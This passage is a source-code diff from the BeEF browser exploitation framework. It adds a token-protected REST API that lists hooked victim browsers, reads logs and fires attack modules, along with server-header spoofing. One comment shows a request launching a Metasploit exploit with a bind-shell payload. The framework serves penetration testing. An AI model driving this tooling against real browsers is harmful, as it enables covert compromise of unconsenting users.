# @todo Document
def apply_defaults()
@datastore.each { |opt|
opt["value"] = oc_value(opt["name"]) || opt["value"]
}
end
private
@use_template
@eruby
@update_zombie
@results
end
end
end

161
core/main/configuration.rb
View File

@@ -15,115 +15,122 @@
#
module BeEF
module Core
module Core
class Configuration
include Singleton
# Loads the default configuration system
# @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
def initialize(configuration_file="#{$root_dir}/config.yaml")
# argument type checking
raise Exception::TypeError, '"configuration_file" needs to be a string' if not configuration_file.string?
# test to make sure file exists
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(configuration_file)
begin
#open base config
@config = self.load(configuration_file)
# set default value if key? does not exist
@config.default = nil
rescue Exception => e
print_error "Fatal Error: cannot load configuration file"
print_debug e
class Configuration
attr_accessor :config
# antisnatchor: still a singleton, but implemented by hand because we want to have only one instance
# of the Configuration object while having the possibility to specify a parameter to the constructor.
# This is why we don't use anymore the default Ruby implementation -> include Singleton
def self.instance()
return @@instance
end
end
# Loads yaml file
# @param [String] file YAML file to be loaded
# @return [Hash] YAML formatted hash
def load(file)
begin
return nil if not File.exists?(file)
raw = File.read(file)
return YAML.load(raw)
rescue Exception => e
print_debug "Unable to load '#{file}' #{e}"
return nil
# Loads the default configuration system
# @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
def initialize(config)
raise Exception::TypeError, '"config" needs to be a string' if not config.string?
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(config)
begin
#open base config
@config = self.load(config)
# set default value if key? does not exist
@config.default = nil
@@config = config
rescue Exception => e
print_error "Fatal Error: cannot load configuration file"
print_debug e
end
@@instance = self
end
end
# Returns the value of a selected key in the configuration file.
# @param [String] key Key of configuration item
# @return [Hash|String] The resulting value stored against the 'key'
def get(key)
# Loads yaml file
# @param [String] file YAML file to be loaded
# @return [Hash] YAML formatted hash
def load(file)
begin
return nil if not File.exists?(file)
raw = File.read(file)
return YAML.load(raw)
rescue Exception => e
print_debug "Unable to load '#{file}' #{e}"
return nil
end
end
# Returns the value of a selected key in the configuration file.
# @param [String] key Key of configuration item
# @return [Hash|String] The resulting value stored against the 'key'
def get(key)
subkeys = key.split('.')
lastkey = subkeys.pop
subhash = subkeys.inject(@config) do |hash, k|
hash[k]
hash[k]
end
return (subhash != nil and subhash.has_key?(lastkey)) ? subhash[lastkey] : nil
end
return (subhash != nil and subhash.has_key?(lastkey)) ? subhash[lastkey] : nil
end
# Sets the give key value pair to the config instance
# @param [String] key The configuration key
# @param value The value to be stored against the 'key'
# @return [Boolean] If the store procedure was successful
def set(key, value)
# Sets the give key value pair to the config instance
# @param [String] key The configuration key
# @param value The value to be stored against the 'key'
# @return [Boolean] If the store procedure was successful
def set(key, value)
subkeys = key.split('.').reverse
return false if subkeys.length == 0
hash = {subkeys.shift.to_s => value}
subkeys.each{|v|
hash = {v.to_s => hash}
hash = {v.to_s => hash}
}
@config = @config.deep_merge(hash)
return true
end
end
# Clears the given key hash
# @param [String] key Configuration key to be cleared
# @return [Boolean] If the configuration key was cleared
def clear(key)
# Clears the given key hash
# @param [String] key Configuration key to be cleared
# @return [Boolean] If the configuration key was cleared
def clear(key)
subkeys = key.split('.')
return false if subkeys.length == 0
lastkey = subkeys.pop
hash = @config
subkeys.each{|v|
hash = hash[v]
hash = hash[v]
}
return (hash.delete(lastkey) == nil) ? false : true
end
return (hash.delete(lastkey) == nil) ? false : true
end
# Load extensions configurations
def load_extensions_config
# Load extensions configurations
def load_extensions_config
self.set('beef.extension', {})
Dir.glob("#{$root_dir}/extensions/*/config.yaml") do | cf |
y = self.load(cf)
if y != nil
y['beef']['extension'][y['beef']['extension'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
else
print_error "Unable to load extension configuration '#{cf}'"
end
y = self.load(cf)
if y != nil
y['beef']['extension'][y['beef']['extension'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
else
print_error "Unable to load extension configuration '#{cf}'"
end
end
end
end
# Load module configurations
def load_modules_config
# Load module configurations
def load_modules_config
self.set('beef.module', {})
Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf |
y = self.load(cf)
if y != nil
y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
# API call for post module config load
BeEF::API::Registrar.instance.fire(BeEF::API::Configuration, 'module_configuration_load', y['beef']['module'].keys.first)
else
print_error "Unable to load module configuration '#{cf}'"
end
y = self.load(cf)
if y != nil
y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
# API call for post module config load
BeEF::API::Registrar.instance.fire(BeEF::API::Configuration, 'module_configuration_load', y['beef']['module'].keys.first)
else
print_error "Unable to load module configuration '#{cf}'"
end
end
end
end
end
end
end
end

6
extensions/console/banners.rb → core/main/console/banners.rb
View File

@@ -14,7 +14,7 @@
# limitations under the License.
#
module BeEF
module Extension
module Core
module Console
module Banners
@@ -25,8 +25,8 @@ module Banners
# Prints BeEF's ascii art
#
def print_ascii_art
if File.exists?('extensions/console/beef.ascii')
File.open('extensions/console/beef.ascii', 'r') do |f|
if File.exists?('core/main/console/beef.ascii')
File.open('core/main/console/beef.ascii', 'r') do |f|
while line = f.gets
puts line
end

0
extensions/console/beef.ascii → core/main/console/beef.ascii
View File

34
extensions/console/commandline.rb → core/main/console/commandline.rb
View File

@@ -14,7 +14,7 @@
# limitations under the License.
#
module BeEF
module Extension
module Core
module Console
#
# This module parses the command line argument when running beef.
@@ -24,6 +24,8 @@ module BeEF
@options = Hash.new
@options[:verbose] = false
@options[:resetdb] = false
@options[:ascii_art] = false
@options[:ext_config] = ""
@already_parsed = false
@@ -35,19 +37,27 @@ module BeEF
return @options if @already_parsed
begin
optparse = OptionParser.new do |opts|
opts.on('-x', '--reset', 'Reset the database') do
@options[:resetdb] = true
optparse = OptionParser.new do |opts|
opts.on('-x', '--reset', 'Reset the database') do
@options[:resetdb] = true
end
opts.on('-v', '--verbose', 'Display debug information') do
@options[:verbose] = true
end
opts.on('-a', '--ascii_art', 'Prints BeEF ascii art') do
@options[:ascii_art] = true
end
opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f|
@options[:ext_config] = f
end
end
opts.on('-v', '--verbose', 'Display debug information') do
@options[:verbose] = true
end
end
optparse.parse!
@already_parsed = true
@options
optparse.parse!
@already_parsed = true
@options
rescue OptionParser::InvalidOption => e
puts "Invalid command line option provided. Please run beef --help"
exit 1

13
core/main/crypto.rb
View File

@@ -36,6 +36,19 @@ module Core
# return random hex string
return OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
end
# Generate a secure random token, 20 chars, used as an auth token for the RESTful API.
# After creation it's stored in the BeEF configuration object => conf.get('beef.api_token')
# @return [String] Security token
def self.api_token
config = BeEF::Core::Configuration.instance
token_length = 20
# return random hex string
token = OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
config.set('beef.api_token', token)
token
end
end
end

4
core/main/handlers/commands.rb
View File

@@ -55,9 +55,11 @@ module Handlers
beefhook = get_param(@data, 'beefhook')
(print_error "BeEFhook is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
result = get_param(@data, 'results')
# @note create the command module to handle the response
command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))
command.build_callback_datastore(@http_params, @http_header)
command.build_callback_datastore(@http_params, @http_header, result, command_id, beefhook)
command.session_id = beefhook
if command.respond_to?(:post_execute)
command.post_execute

2
core/main/models/commandmodule.rb
View File

@@ -28,8 +28,6 @@ module Models
property :path, Text, :lazy => false
has n, :commands
has 1, :dynamic_command_info
end
end

2
core/main/network_stack/handlers/dynamicreconstruction.rb
View File

@@ -54,7 +54,7 @@ module Handlers
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST'
'Access-Control-Allow-Methods' => 'POST, GET'
}
)

44
core/main/rest/api.rb Normal file
View File

@@ -0,0 +1,44 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
module RegisterHooksHandler
def self.mount_handler(server)
server.mount('/api/hooks', BeEF::Core::Rest::HookedBrowsers.new)
end
end
module RegisterModulesHandler
def self.mount_handler(server)
server.mount('/api/modules', BeEF::Core::Rest::Modules.new)
end
end
module RegisterLogsHandler
def self.mount_handler(server)
server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
end
end
end

77
core/main/rest/handlers/hookedbrowsers.rb Normal file
View File

@@ -0,0 +1,77 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class HookedBrowsers < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found.' end
before do
error 401 unless params[:token] == config.get('beef.api_token')
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
get '/' do
online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
output = {
'hooked-browsers' => {
'online' => online_hooks,
'offline' => offline_hooks
}
}
output.to_json
end
def hb_to_json(hbs)
hbs_hash = {}
i = 0
hbs.each do |hb|
hbs_hash[i] = (get_hb_details(hb))
i+=1
end
hbs_hash
end
def get_hb_details(hb)
details = BeEF::Extension::Initialization::Models::BrowserDetails
{
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'SystemPlatform'),
'session' => hb.session,
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'page_uri' => details.get(hb.session, 'PageURI')
}
end
end
end
end
end

74
core/main/rest/handlers/logs.rb Normal file
View File

@@ -0,0 +1,74 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class Logs < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found.' end
before do
error 401 unless params[:token] == config.get('beef.api_token')
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get all global logs
get '/' do
logs = BeEF::Core::Models::Log.all()
logs_to_json(logs)
end
# @note Get hooked browser logs
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
logs = BeEF::Core::Models::Log.all(:hooked_browser_id => hb.id)
logs_to_json(logs)
end
private
def logs_to_json(logs)
logs_json = []
count = logs.length
logs.each do |log|
logs_json << {
'id' => log.id.to_i,
'date' => log.date.to_s,
'event' => log.event.to_s,
'type' => log.type.to_s
}
end
{
'logs_count' => count,
'logs' => logs_json
}.to_json if not logs_json.empty?
end
end
end
end
end

147
core/main/rest/handlers/modules.rb Normal file
View File

@@ -0,0 +1,147 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class Modules < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found.' end
before do
error 401 unless params[:token] == config.get('beef.api_token')
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get all available and enabled modules (id, name, category)
get '/' do
mods = BeEF::Core::Models::CommandModule.all
mods_hash = {}
i = 0
mods.each do |mod|
modk = BeEF::Module.get_key_by_database_id(mod.id)
next if !BeEF::Module.is_enabled(modk)
mods_hash[i] = {
'id' => mod.id,
'name' => config.get("beef.module.#{modk}.name"),
'category' => config.get("beef.module.#{modk}.category")
}
i+=1
end
mods_hash.to_json
end
# @note Get the module definition (info, options)
get '/:mod_id' do
cmd = BeEF::Core::Models::CommandModule.get(params[:mod_id])
error 404 unless cmd != nil
modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
error 404 unless modk != nil
#todo check if it's possible to also retrieve the TARGETS supported
{
'name' => cmd.name,
'description' => config.get("beef.module.#{cmd.name}.description"),
'category'=> config.get("beef.module.#{cmd.name}.category"),
'options' => BeEF::Module.get_options(modk) #todo => get also payload options..get_payload_options(modk,text)
}.to_json
end
# @note Get the module result for the specific executed command
#
# Example with the Alert Dialog
#GET /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86/1?token=0a931a461d08b86bfee40df987aad7e9cfdeb050 HTTP/1.1
#Host: 127.0.0.1:3000
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#
#{"date":"1331637093","data":"{\"data\":\"text=michele\"}"}
get '/:session/:mod_id/:cmd_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
cmd = BeEF::Core::Models::Command.first(:hooked_browser_id => hb.id,
:command_module_id => params[:mod_id], :id => params[:cmd_id])
error 404 unless cmd != nil
result = BeEF::Core::Models::Result.first(:hooked_browser_id => hb.id, :command_id => cmd.id)
error 404 unless result != nil
{
'date' => result.date,
'data' => result.data
}.to_json
end
# @note Fire a new command module to the specified hooked browser.
# Return the command_id of the executed module if it has been fired correctly.
# Input must be specified in JSON format
#
# +++ Example with the Alert Dialog: +++
#POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
#Host: 127.0.0.1:3000
#Content-Type: application/json; charset=UTF-8
#Content-Length: 18
#
#{"text":"michele"}
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#Content-Length: 35
#
#{"success":"true","command_id":"1"}
#
# +++ Example with a Metasploit module (Adobe FlateDecode Stream Predictor 02 Integer Overflow) +++
# +++ note that in this case we cannot query BeEF/Metasploit if module execution was successful or not.
# +++ this is why there is "command_id":"not_available" in the response
#POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/236?token=83f13036060fd7d92440432dd9a9b5e5648f8d75 HTTP/1.1
#Host: 127.0.0.1:3000
#Content-Type: application/json; charset=UTF-8
#Content-Length: 81
#
#{"SRVPORT":"3992", "URIPATH":"77345345345dg", "PAYLOAD":"generic/shell_bind_tcp"}
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#Content-Length: 35
#
#{"success":"true","command_id":"not_available"}
post '/:session/:mod_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
error 404 unless modk != nil
request.body.rewind
begin
data = JSON.parse request.body.read
options = []
data.each{|k,v| options.push({'name' => k, 'value' => v})}
exec_results = BeEF::Module.execute(modk, params[:session], options)
exec_results != nil ? '{"success":"true","command_id":"'+exec_results.to_s+'"}' : '{"success":"false"}'
rescue Exception => e
print_error "Invalid JSON input for module '#{params[:mod_id]}'"
error 400 # Bad Request
end
end
end
end
end
end

28
core/main/models/dynamiccommandinfo.rb → core/main/router/api.rb
View File

@@ -14,23 +14,17 @@
# limitations under the License.
#
module BeEF
module Core
module Models
module Core
module Router
class DynamicCommandInfo
include DataMapper::Resource
storage_names[:default] = 'core_dynamiccommandinfo'
property :id, Serial
property :name, Text, :lazy => false
property :description, Text, :lazy => false
property :targets, Text, :lazy => false
belongs_to :command_module
module RegisterRouterHandler
def self.mount_handler(server)
server.mount('/', BeEF::Core::Router::Router.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Router::RegisterRouterHandler, BeEF::API::Server, 'mount_handler')
end
end
end
end
end

57
core/main/router/router.rb Normal file
View File

@@ -0,0 +1,57 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Router
#@note This is the main Router parent class.
#@note All the HTTP handlers registered on BeEF will extend this class.
class Router < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found' end
before do
# @note Override Server HTTP response header
if config.get("beef.http.web_server_imitation.enable")
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
headers "Server" => "Apache/2.2.3 (CentOS)"
#todo https://github.com/beefproject/beef/issues/98 if web_server imitation is enabled
#todo the 404 response will be something like the following:
#<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
#<html><head>
#<title>404 Not Found</title>
#</head><body>
#<h1>Not Found</h1>
#<p>The requested URL /aaaa was not found on this server.</p>
# <hr>
# <address>Apache/2.2.3 (CentOS)</address>
# </body></html>
when "iis"
headers "Server" => "Microsoft-IIS/7.0"
end
end
end
end
end
end
end

54
core/module.rb
View File

@@ -67,11 +67,6 @@ module BeEF
if class_symbol and class_symbol.respond_to?(:options)
return class_symbol.options
end
#TODO: do we really need to print this info? At then modules with no options are common,
# so I guess we shouldn't print this info even in debug mode
# else
# print_debug "Module '#{mod}', no options method defined"
# end
end
return []
end
@@ -208,10 +203,13 @@ module BeEF
case v
when String
if opts['browser'] == v
# if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
# rating += 1
# end
results << {'rating' => 2, 'const' => k}
end
when Hash
if opts['browser'] == v.keys.first
if opts['browser'] == v.keys.first or v.keys.first == BeEF::Core::Constants::Browsers::ALL
subv = v[v.keys.first]
rating = 1
#version check
@@ -241,14 +239,15 @@ module BeEF
rating += 1
match = true
elsif subv['os'] == BeEF::Core::Constants::Os::OS_ALL_UA_STR
rating += 1
match = true
end
when Array
subv['os'].each{|p|
if o == p or p == BeEF::Core::Constants::Os::OS_ALL_UA_STR
if o == p
rating += 1
match = true
elsif p == BeEF::Core::Constants::Os::OS_ALL_UA_STR
match = true
end
}
end
@@ -257,18 +256,35 @@ module BeEF
break
end
end
if rating != 1
if rating > 0
# if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
# rating += 1
# end
results << {'rating' => rating, 'const' => k}
end
end
end
if v == BeEF::Core::Constants::Browsers::ALL
results << {'rating' => 1, 'const' => k}
rating = 1
if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
rating = 1
end
results << {'rating' => rating, 'const' => k}
end
}
}
if results.count > 0
return results.sort_by {|v| v['rating']}.last['const']
result = {}
results.each {|r|
if result == {}
result = {'rating' => r['rating'], 'const' => r['const']}
else
if r['rating'] > result['rating']
result = {'rating' => r['rating'], 'const' => r['const']}
end
end
}
return result['const']
else
return BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN
end
@@ -413,22 +429,22 @@ module BeEF
# @param [String] mod module key
# @param [String] hbsession hooked browser session
# @param [Array] opts array of module execute options (see #get_options)
# @return [Boolean] whether or not the BeEF system executed the module
# @return [Fixnum] the command_id associated to the module execution when info is persisted. nil if there are errors.
# @note The return value of this function does not specify if the module was successful, only that it was executed within the framework
def self.execute(mod, hbsession, opts=[])
if not (self.is_present(mod) and self.is_enabled(mod))
print_error "Module not found '#{mod}'. Failed to execute module."
return false
return nil
end
if BeEF::API::Registrar.instance.matched?(BeEF::API::Module, 'override_execute', [mod, nil,nil])
BeEF::API::Registrar.instance.fire(BeEF::API::Module, 'override_execute', mod, hbsession,opts)
# @note We return true by default as we cannot determine the correct status if multiple API hooks have been called
return true
# @note We return not_nil by default as we cannot determine the correct status if multiple API hooks have been called
return 'not_available' # @note using metasploit, we cannot know if the module execution was successful or not
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
return nil
end
self.check_hard_load(mod)
command_module = self.get_definition(mod).new(mod)
@@ -436,12 +452,12 @@ module BeEF
command_module.pre_execute
end
h = self.merge_options(mod, [])
c = BeEF::Core::Models::Command.new(:data => self.merge_options(mod, opts).to_json,
c = BeEF::Core::Models::Command.create(:data => self.merge_options(mod, opts).to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
return true
)
return c.id
end
# Merges default module options with array of custom options

30
core/ruby/hash.rb
View File

@@ -15,20 +15,20 @@
#
class Hash
# Recursively deep merge two hashes together
# @param [Hash] hash Hash to be merged
# @return [Hash] Combined hash
# @note Duplicate keys are overwritten by the value defined in the hash calling deep_merge (not the parameter hash)
# @note http://snippets.dzone.com/posts/show/4706
def deep_merge(hash)
target = dup
hash.keys.each do |key|
if hash[key].is_a? Hash and self[key].is_a? Hash
target[key] = target[key].deep_merge(hash[key])
next
end
target[key] = hash[key]
end
target
# Recursively deep merge two hashes together
# @param [Hash] hash Hash to be merged
# @return [Hash] Combined hash
# @note Duplicate keys are overwritten by the value defined in the hash calling deep_merge (not the parameter hash)
# @note http://snippets.dzone.com/posts/show/4706
def deep_merge(hash)
target = dup
hash.keys.each do |key|
if hash[key].is_a? Hash and self[key].is_a? Hash
target[key] = target[key].deep_merge(hash[key])
next
end
target[key] = hash[key]
end
target
end
end

24
core/ruby/module.rb
View File

@@ -21,7 +21,7 @@ class Module
classes = []
ObjectSpace.each_object(Class) { |k| classes << k if k.included_modules.include?(self) }
classes.reverse.inject([]) do |unique_classes, klass|
classes.reverse.inject([]) do |unique_classes, klass|
unique_classes << klass unless unique_classes.collect { |k| k.to_s }.include?(klass.to_s)
unique_classes
end
@@ -32,26 +32,8 @@ class Module
def included_in_modules
modules = []
ObjectSpace.each_object(Module) { |k| modules << k if k.included_modules.include?(self) }
modules.reverse.inject([]) do |unique_modules, klass|
unique_modules << klass unless unique_modules.collect { |k| k.to_s }.include?(klass.to_s)
unique_modules
end
end
# Returns the modules extended inside the target module
# @return [Array] Array of modules
def extended_modules
(class << self; self end).included_modules
end
# Returns the modules extending the target module
# @return [Array] Array of modules
def extended_in_modules
modules = []
ObjectSpace.each_object(Module) { |k| modules << k if k.extended_modules.include?(self) }
modules.reverse.inject([]) do |unique_modules, klass|
modules.reverse.inject([]) do |unique_modules, klass|
unique_modules << klass unless unique_modules.collect { |k| k.to_s }.include?(klass.to_s)
unique_modules
end

14
core/ruby/object.rb
View File

@@ -14,35 +14,35 @@
# limitations under the License.
#
class Object
# Returns true if the object is a Boolean
# @return [Boolean] Whether the object is boolean
def boolean?
self.is_a?(TrueClass) || self.is_a?(FalseClass)
self.is_a?(TrueClass) || self.is_a?(FalseClass)
end
# Returns true if the object is a String
# @return [Boolean] Whether the object is a string
def string?
self.is_a?(String)
end
# Returns true if the object is an Integer
# @return [Boolean] Whether the object is an integer
def integer?
self.is_a?(Integer)
end
# Returns true if the object is a hash
# @return [Boolean] Whether the object is a hash
def hash?
self.is_a?(Hash)
end
# Returns true if the object is a class
# @return [Boolean] Whether the object is a class
def class?
self.is_a?(Class)
end
end

38
core/ruby/patches/dm-do-adapter/adapter.rb
View File

@@ -55,27 +55,27 @@ module DataMapper
def normalized_uri
@normalized_uri ||=
begin
keys = [
:adapter, :user, :password, :host, :port, :path, :fragment,
:scheme, :query, :username, :database ]
query = DataMapper::Ext::Hash.except(@options, keys)
query = nil if query.empty?
begin
keys = [
:adapter, :user, :password, :host, :port, :path, :fragment,
:scheme, :query, :username, :database ]
query = DataMapper::Ext::Hash.except(@options, keys)
query = nil if query.empty?
# Better error message in case port is no Numeric value
port = @options[:port].nil? ? nil : @options[:port].to_int
# Better error message in case port is no Numeric value
port = @options[:port].nil? ? nil : @options[:port].to_int
DataObjects::URI.new({
:scheme => @options[:adapter],
:user => @options[:user] || @options[:username],
:password => @options[:password],
:host => @options[:host],
:port => port,
:path => @options[:path] || @options[:database],
:query => query,
:fragment => @options[:fragment]
}).freeze
end
DataObjects::URI.new({
:scheme => @options[:adapter],
:user => @options[:user] || @options[:username],
:password => @options[:password],
:host => @options[:host],
:port => port,
:path => @options[:path] || @options[:database],
:query => query,
:fragment => @options[:fragment]
}).freeze
end
end
end

15
core/ruby/print.rb
View File

@@ -29,12 +29,11 @@ end
# Function used to print debug information
# @param [String] s String to be printed
# @note This function will only print messages if the debug flag is set to true
# @todo Once the console extension has been merged into the core, remove the extension checks.
def print_debug(s)
config = BeEF::Core::Configuration.instance
if config.get('beef.debug') || (BeEF::Extension.is_loaded('console') && BeEF::Extension::Console.verbose?)
puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
end
config = BeEF::Core::Configuration.instance
if config.get('beef.debug') || BeEF::Core::Console::CommandLine.parse[:verbose]
puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
end
end
# Function used to print successes to the console
@@ -49,14 +48,14 @@ end
def print_more(s)
time = Time.now.localtime.strftime("[%k:%M:%S]")
lines = s.split("\n")
lines.each_with_index do |line, index|
lines.each_with_index do |line, index|
if ((index+1) == lines.size)
puts "#{time} |_ #{line}"
else
puts "#{time} | #{line}"
end
end
end
end
# Function used to print over the current line

2
core/ruby/string.rb
View File

@@ -18,5 +18,5 @@ class String
# @note Use a gem to colorize the console.
# @note http://flori.github.com/term-ansicolor/
include Term::ANSIColor
end

33
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -208,36 +208,6 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal ip address
internal_ip = BD.get(zombie_session, 'InternalIP')
if not internal_ip.nil?
encoded_internal_ip = CGI.escapeHTML(internal_ip)
encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_ip_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal hostname
internal_hostname = BD.get(zombie_session, 'InternalHostname')
if not internal_hostname.nil?
encoded_internal_hostname = CGI.escapeHTML(internal_hostname)
encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_hostname_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(zombie_session, 'SystemPlatform')
if not system_platform.nil?
@@ -636,7 +606,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
def2.push({'name' => k, 'value' => v})
}
# End hack
@body = (BeEF::Module.execute(mod_key, zombie_session, def2)) ? '{success: true}' : '{success: false}'
exec_results = BeEF::Module.execute(mod_key, zombie_session, def2)
@body = (exec_results != nil) ? '{success: true}' : '{success: false}'
end
# Re-execute an command_module to a zombie.

6
extensions/admin_ui/controllers/xssrays/xssrays.rb
View File

@@ -80,7 +80,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
)
xssrays_scan.save
